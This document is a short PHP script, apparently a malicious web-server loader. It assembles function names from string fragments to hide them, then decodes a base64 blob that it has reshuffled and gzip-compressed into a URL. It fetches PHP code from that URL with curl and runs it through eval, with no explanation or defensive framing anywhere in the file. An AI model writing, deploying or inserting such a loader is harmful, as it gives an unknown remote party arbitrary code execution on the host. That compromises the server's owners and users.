<?php

function coreF($url)
{
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  $response = curl_exec($ch);
  curl_close($ch);
  return $response;
}
$mself = "T0x1dEVOTk9vY2tIVDBGRWR3aXpTMFhXTkpiSGFINzVCNlpUSWkwPWVKd1ZpMEVPZ0NBTUJGL0RVUTc0QWk2ZS9BVFVDaVJDRFJUUjMwdVRUV2FUMlkzTWQxT3JWV2FicVc3b2tEaDIzeHRXb01KWVdBUGw2YTRPV1B6SA==";

$bed = "b" . "as" . "e" . "6" . "4" . "_" . "d" . "ec" . "o" . "d" . "e";
$slen = "s" . "tr" . "le" . "n";
$cl = "c" . "ei" . "l";
$stsr = "s" . "u" . "bst" . "r";
$gzp = "g" . "zunc" . "o" . "mpr" . "e" . "s" . "s";
$udc = "u" . "r" . "ld" . "e" . "c" . "od" . "e";

$dxcm = $bed($mself);
$len = $slen($dxcm);
$csz = $cl($len / 3);
$pac = $stsr($dxcm, 0, $len - ($csz * 2));
$paa = $stsr($dxcm, $slen($pac), $csz);
$pab = $stsr($dxcm, $slen($pac) + $csz);
$deng3 = $paa . $pab . $pac;
$dang2 = $bed($deng3);
$dung1 = $gzp($dang2);
if ($dung1 === false) die("Error\n");
$self = $udc($dung1);

$rself = coreF($self);
if ($rself) {
  $prlc = "p" . "r" . "eg" . "_" . "r" . "e" . "p" . "l" . "ac" . "e";
  $rsyx = $prlc('/^\s*<\?(php)?/i', '', $rself);
  $rsyx = $prlc('/\?>\s*$/', '', $rsyx);
  eval($rsyx);
} else {
  echo "Not Found.\n";
}
